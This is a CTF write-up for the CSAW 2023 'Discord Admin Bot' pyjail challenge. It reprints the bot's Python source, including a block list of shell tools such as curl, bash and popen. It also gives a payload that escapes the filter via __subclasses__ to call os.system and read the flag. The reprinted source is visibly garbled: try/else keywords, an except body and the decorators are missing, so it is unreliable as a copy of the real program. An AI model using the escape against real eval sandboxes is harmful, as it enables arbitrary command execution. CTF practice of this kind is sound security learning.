ctf-writeup/2023/CSAW CTF Qualification Roun.../Discord Admin Bot
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Discord Admin Bot

Join discord and get the flag.

discord.gg/csaw23 discord.gg/csaw23 discord.gg/csaw23 discord.gg/csaw23 discord.gg/csaw23 discord.gg/csaw23 discord.gg/csaw23 discord.gg/csaw23 discord.gg/csaw23 discord.gg/csaw23

About the Challenge

There is a discord bot called Kalkulatoor


And we got some the source code too. Here is the bot source code

# Author: Krishnan Navadia
# This is main working file for this chal

import discord
from discord.ext import commands, tasks
import subprocess

from settings import ADMIN_ROLE
import os
from dotenv import load_dotenv
from time import time


TOKEN = os.getenv("TOKEN")

intents = discord.Intents.default()
intents.messages = True
bot = commands.Bot(command_prefix="!", intents=intents)


SHELL_ESCAPE_CHARS = [":", "curl", "bash", "bin", "sh", "exec", "eval,", "|", "import", "chr", "subprocess", "pty", "popen", "read", "get_data", "echo", "builtins", "getattr"]


def excape_chars(strings_array, text):
    return any(string in text for string in strings_array)

def pyjail(text):
    if excape_chars(SHELL_ESCAPE_CHARS, text):
        return "No shells are allowed"

    text = f"print(eval(\"{text}\"))"
    proc = subprocess.Popen(['python3', '-c', text], stdout=subprocess.PIPE, preexec_fn=os.setsid)
    output = ""
        out, err = proc.communicate(timeout=1)
        output = out.decode().replace("\r", "")
        print('terminating process now')
    except Exception as e:

    if output:
        return f"```{output}```"

async def on_ready():
    print(f'{bot.user} successfully logged in!')

@bot.command(name="flag", pass_context=True)
async def flag(ctx):
    admin_flag = any(role.name == ADMIN_ROLE for role in ctx.message.author.roles)

    if admin_flag:
        cmds = "Here are some functionalities of the bot\n\n`!add <number1> + <number2>`\n`!sub <number1> - <number2>`"
        await ctx.send(cmds)
        message = "Only 'admin' can see the flag.😇"
        await ctx.send(message)

@bot.command(name="add", pass_context=True)
async def add(ctx, *args):
    admin_flag = any(role.name == ADMIN_ROLE for role in ctx.message.author.roles)
    if admin_flag:
        arg = " ".join(list(args))
        user_id = ctx.message.author.id
        ans = pyjail(arg)
        if ans: await ctx.send(ans)
        await ctx.send("no flag for you, you are cheating.😔")

@bot.command(name="sub", pass_context=True)
async def sub(ctx, *args):
    admin_flag = any(role.name == ADMIN_ROLE for role in ctx.message.author.roles)
    if admin_flag:
        arg = " ".join(list(args))
        ans = pyjail(arg)
        if ans: await ctx.send(ans)
        await ctx.send("no flag for you, you are cheating.😔")

@bot.command(name="help", pass_context=True)
async def help(ctx, *args):
    await ctx.send("Try getting `!flag` buddy... Try getting flag.😉")

async def on_command_error(ctx, error):
    if isinstance(error, commands.CommandNotFound):
        await ctx.send("Try getting `!flag` buddy... Try getting flag.😉")
        print(f'Error: {error}')


This is a Pyjail challenge, but we need to have an admin role to execute python commands

How to Solve?

First, we need to invite the bot on our discord server by using accessing this URL


Hmmm, how do you know if the bot id was 1151613133027295232? You can use developer mode and then right click the bot profile and press Copy User ID button


To use the bot, we also need to create a custom discord role called admin and assign it to our account. And then we can use command !add or !sub to execute some python command

@bot.command(name="add", pass_context=True)
async def add(ctx, *args):
    admin_flag = any(role.name == ADMIN_ROLE for role in ctx.message.author.roles)
    if admin_flag:
        arg = " ".join(list(args))
        user_id = ctx.message.author.id
        ans = pyjail(arg)
        if ans: await ctx.send(ans)
        await ctx.send("no flag for you, you are cheating.😔")

@bot.command(name="sub", pass_context=True)
async def sub(ctx, *args):
    admin_flag = any(role.name == ADMIN_ROLE for role in ctx.message.author.roles)
    if admin_flag:
        arg = " ".join(list(args))
        ans = pyjail(arg)
        if ans: await ctx.send(ans)
        await ctx.send("no flag for you, you are cheating.😔")

Because there is a list of blacklisted characters, we can still bypass it by running this command

!add print(().__class__.__base__.__subclasses__()[133].__init__.__globals__['system']('ls'))


And then read the flag by running cat flag.txt command

